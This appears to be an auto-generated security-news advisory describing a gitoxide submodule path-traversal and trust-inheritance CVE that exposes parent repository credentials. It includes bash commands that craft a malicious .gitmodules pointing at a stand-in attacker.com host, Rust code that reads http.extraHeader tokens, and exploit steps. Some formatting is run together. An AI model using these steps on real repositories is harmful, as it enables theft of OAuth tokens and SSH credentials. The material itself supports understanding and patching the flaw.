Listen to this Post
How the mentioned CVE works (around 20 lines):
The vulnerability combines three bugs in gitoxide (Rust Git implementation). Bug 1 – Validation bypass in `gix-validate/src/submodule.rs` name() function: it calls `name.find(b”..”)` which returns only the first occurrence. A crafted submodule name like `a..b/../../../.git/` passes because the first `..` (at position 1) is followed by `b` (not `/` or \), so the function returns `Ok` without checking the remaining `../../..` traversal sequence. Bug 2 – The validation function `gix_validate::submodule::name()` has zero production callers; the `names()` iterator in `gix-submodule/src/access.rs:29` returns unvalidated names, and `git_dir()` at `gix/src/submodule/mod.rs:198-204` constructs filesystem paths directly from raw names via join(gix_path::from_bstr(self.name())). Bug 3 – Trust inheritance bypass in `Submodule::open()` (line 270): it clones the parent repository’s options, which includes git_dir_trust = Some(Trust::Full). At gix/src/open/repository.rs:103-104, ownership check is skipped because trust is already Some(Full). Thus any traversed path (e.g., .git/modules/x..y/../../../.git) is opened with full trust, bypassing safe-directory protections. Attack chain: attacker crafts `.gitmodules` with [submodule "x..y/../../.."]; victim clones and performs `submodule.open()` or status(); `git_dir()` resolves to parent .git/; `open_opts()` uses Trust::Full; victim’s parent `.git/config` is fully parsed, exposing credentials (remote URL tokens, http.extraHeader, credential., core.sshCommand). Impact: High – network vector, user interaction, credential disclosure.
dailycve form (3 words max per line):
Platform: gitoxide
Version: before fix
Vulnerability: path traversal
Severity: High
date: 2025-02-19
Prediction: 2025-03-15
What Undercode Say:
Bash commands to test traversal:
git init malicious git config -f .gitmodules submodule."a..b/../../../.git".path innocent git config -f .gitmodules submodule."a..b/../../../.git".url https://attacker.com/repo.git git add .gitmodules git commit -m "malicious submodule"
Rust code to reproduce:
let repo = gix::open("victim_repo")?;
for sub in repo.submodules()? {
if let Ok(sub_repo) = sub.open() {
let cfg = sub_repo.config_snapshot();
println!("{:?}", cfg.string("http.extraHeader"));
}
}
Exploit:
Craft `.gitmodules` with traversing name, push to public repo. Victim clones and runs `git submodule update –init` (or any tool calling submodule.open()). The path `x..y/../../..` resolves to parent .git/. With Trust::Full, attacker reads `.git/config` containing OAuth tokens, SSH commands, or private remote URLs.
Protection from this CVE:
- Upgrade gitoxide to patched version (iterate all `..` occurrences in validation).
- Call `gix_validate::submodule::name()` in `git_dir()` before path construction.
- Do not inherit `git_dir_trust` from parent; always re-derive trust from path ownership.
- Use `git config –global safe.directory ”` temporarily but not recommended.
- Audit tools using gitoxide for submodule handling.
Impact:
Confidentiality: High – arbitrary git configs (credentials, tokens) exposed from any traversable `.git` directory. Integrity: None directly, but leaked tokens enable lateral compromise. Availability: None. Affects all platforms using gitoxide < patched version (Rust crates gix, gitoxide). Requires victim to perform submodule operation on malicious repo. Same class as GHSA-7w47-3wg8-547c but with trust bypass amplifier.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
